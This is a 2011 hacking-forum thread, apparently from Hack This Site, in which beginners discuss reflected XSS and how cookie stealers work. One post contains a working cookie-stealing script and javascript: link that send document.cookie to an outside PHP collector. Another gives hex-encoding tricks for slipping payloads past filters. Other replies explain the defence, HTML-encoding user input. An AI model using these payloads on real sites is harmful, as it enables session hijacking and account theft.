[beginner] Non-Persistent XSS

Discuss the many weaknesses of browser security and ways to mitigate the threat

Re: [beginner] Non-Persistent XSS

Post by mutantsrus on Tue May 10, 2011 11:37 am
([msg=57243]see Re: [beginner] Non-Persistent XSS[/msg])

To understand how a cookie stealer works, first understand how a cookie works. A person can view their cookie, and theirs alone, by typing javascript:alert(document.cookie) in the address bar. Now if you can only view your cookie, then how could you go about stealing someone else's? You'd need that same JS to run on their computer right? Then you'd need it to be recorded and sent back to you. This is what a cookie stealer does, so in the end, it returns the cookie of anyone who falls prey to the trick.
User avatar
mutantsrus
New User
New User
 
Posts: 40
Joined: Wed Jan 21, 2009 8:01 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by Reason7194 on Tue May 10, 2011 2:24 pm
([msg=57251]see Re: [beginner] Non-Persistent XSS[/msg])

The only part I don't understand is how a person 'links' a link to a said forum, but includes the javascript needed to grab the cookie. The person can't type into the chat box all of the js syntax, only the link.

-- Tue May 10, 2011 2:33 pm --

The same goes for adding the javascript to post like this one. I can't just put the Javascript here else the user would see it. Watch, I shall try -> <script language="Javascript">
document.location="http://justthink.frihost.org/cook.php?cookie=" + document.cookie;
</script>

<a href="javascript:document.location='http://justthink.frihost.org/cook.php?cookie='+document.cookie;">Click here to see if it actually worked!</a>

-- Tue May 10, 2011 2:34 pm --

See? The javascript appeared =/
I study Gotafu.
Reason7194
Poster
Poster
 
Posts: 215
Joined: Fri Jan 07, 2011 5:01 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by Goatboy on Tue May 10, 2011 4:10 pm
([msg=57255]see Re: [beginner] Non-Persistent XSS[/msg])

The reason people can type in JS is that the forum does not filter or encode the input properly. A good security practice is to either strip out characters that can be used in an attacks ( < > ' " etc ) or, better yet, HTML-encode them to make them safe for showing. HTS does the latter.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2788
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by Dwere134 on Wed May 11, 2011 10:54 am
([msg=57292]see Re: [beginner] Non-Persistent XSS[/msg])

I am not sure if my question has been answered yet. Does the cookie stealer that Goatboy posted in the other thread steal EVERYONE'S cookies? Or just his target? Like if anyone clicked on it does goat have access to their cookies? Or is it just if the guy he was targeting clicks on it?
Dwere (David)
Goatboy wrote:
Dwere wrote:I'm not one to start some branch of religion though. Not my thing.

Of course if you wanted to, you could call it the Davidians!
Dwere134
Experienced User
Experienced User
 
Posts: 83
Joined: Mon Sep 27, 2010 5:06 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by Reason7194 on Wed May 11, 2011 12:36 pm
([msg=57294]see Re: [beginner] Non-Persistent XSS[/msg])

Then Goatboy, how did you write the javascript in your post then.
I study Gotafu.
Reason7194
Poster
Poster
 
Posts: 215
Joined: Fri Jan 07, 2011 5:01 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by jgreen45 on Wed May 11, 2011 3:50 pm
([msg=57298]see Re: [beginner] Non-Persistent XSS[/msg])

Reason7194 wrote:Then Goatboy, how did you write the javascript in your post then.


He didn't, the javascript was never executed on HTS. He just posted a simple link here with a search term that contained an encoded javascript redirect to a .js script on his website. The problem was at the victim's website, the coder decided to echo whatever was written into the search box onto his result's page directly in the HTML, but he forgot to strip the bad characters, so the malicious search term was placed directly into the page.

When the browser parsed the page it saw the malicious search term and read it as javascript which was then executed and voila! Cookies gallor.

On a side note even if Goatboy did manage to execute JS code on HTS he would only be able to access the HTS cookies anyway, it's a safety mechanism built into the browser.
I can't come to bed...
Someone is WRONG on the internet


http://xkcd.com/386/
User avatar
jgreen45
Poster
Poster
 
Posts: 106
Joined: Wed Feb 25, 2009 6:18 pm
Blog: View Blog (0)


Re: [beginner] Non-Persistent XSS

Post by mutantsrus on Sun May 22, 2011 5:46 pm
([msg=57671]see Re: [beginner] Non-Persistent XSS[/msg])

Reason7194 wrote:The only part I don't understand is how a person 'links' a link to a said forum, but includes the javascript needed to grab the cookie. The person can't type into the chat box all of the js syntax, only the link.


1. You can obfuscate the code with something like this:
http://www.pc-help.org/obscure.htm (might not work in most browsers anymore.)

2. You could also use hex in the url:
"><marquee>
can be written as
%22%3e%3c%6d%61%72%71%75%65%65%3e%74%65%73%74%a

3. HTML doesn't work on these forums, but works in many other places. (Thus making XSS/CSRF a possibility)
User avatar
mutantsrus
New User
New User
 
Posts: 40
Joined: Wed Jan 21, 2009 8:01 pm
Blog: View Blog (0)


Previous

Return to Web

Who is online

Users browsing this forum: No registered users and 0 guests